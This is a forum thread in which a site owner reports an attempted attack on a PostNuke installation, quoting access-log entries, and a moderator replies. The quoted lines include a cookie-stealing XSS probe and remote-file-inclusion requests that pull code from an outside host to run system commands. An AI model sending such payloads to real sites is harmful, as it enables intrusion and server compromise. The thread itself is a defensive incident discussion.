Security incident (accompanied by access log file info) :: Zikula Community

Get Zikula 1.3.3!New core, modules & more

Quick Links

Donate Today!Support your Software

Documentationlearn, share & develop

Watch

GitHub Core

Show your support for Zikula! Sign up at Github account and watch the Core project!

GitHub Modules

Forum Activity

mesteele101 responded to »ERR (3): E_USER_ERROR: Smarty error: [in pagesvar:pagesitem2en line XXX]…« 07:01 AM
mazdev responded to »Pages 2.5.0 and updating - Page not found« 06:41 AM
ehdwma created topic »Hide "Register new account" and change template to 3 col« 06:27 AM
mesteele101 responded to »Zikula 1.3.3 - Selecting a category in Pages not working« 01:29 AM
mdee created topic »How to implement returnpage ?« 01:00 AM
nestormateo responded to »Fillters in Clip« 24. May
damon responded to »Can the Updated Version Check be Turned Off (Z 1.3)« 24. May

» Visit forum | » View latest posts

Zikula Blog

Anatomy of Open Source Projects on Mar 07
Continuous Review on Mar 01
Not Invented Here on Feb 24
How to Contribute Your Code at Github on Jan 13
10 Steps to Coding-Nirvana: Tips for Successful Module Writing on Nov 12
Submitting Bug Report Tickets That Get Results on Aug 17
Cozi Tricks #1: Syntax Highlighting on Aug 07

Security incident (accompanied by access log file info)

Print topic

**unknown user**

Rank: Registered User

Registered: Mar 16, 2002

Last visit: Oct 21, 2009

Posts: 42
Posted: Apr 28, 2005 - 11:22 PM

(I post here since there is no security thread)

Last night someone was trying to hack my PN installation. Besides the trivial:

Code
GET /index.php?module=<script>alert(document.cookie)</script>

... that triggered mod_security into mailing me the audit_log (and noticing the lammer in the first place), he tried:

Quote
> tail -100000l /PN-access_log | egrep 'LAMER_IP' | awk '{print $11}' | sort | uniq -c | sort -nr

36 "http://mypn/index.php?module=ContentExpress&func=display&ceid=23&meid=24"
34 "http://mypn/index.php?module=ContentExpress&file=index&func=display&ceid=11&meid=12"
20 "-"
7 "http://mypn/index.php?module=http://www.fendora.net/asc/xpl/asc?&cmd=uname%20-a;w;id;pwd"
7 "http://mypn/index.php?module=ContentExpress&func=display&ceid=53&meid=http://www.fendora.net/asc/xpl/asc?&cmd=uname%20-a;w;id;pwd"
5 "http://mypn/index.php?module=ContentExpress&func=display&ceid=53&meid=-1"
1 "http://mypn/index.php?module=ContentExpress&func=display&ceid=47"

Do the 4th and 5th line approach any know PN vulnerability..? Probably a poorly engineered script...
Simon

Rank: Legend

Registered: Dec 11, 2002

Last visit: Oct 21, 2009

Posts: 11674
Posted: Apr 29, 2005 - 02:23 AM

5th line is a CE issue, so can't say.

Line 4 is not a problem - simply causes a redirect to index.php.

--
itbegins.co.uk - Zikula Consulting

birtwistle.me.uk - Personal Blog

Please read the Support Guide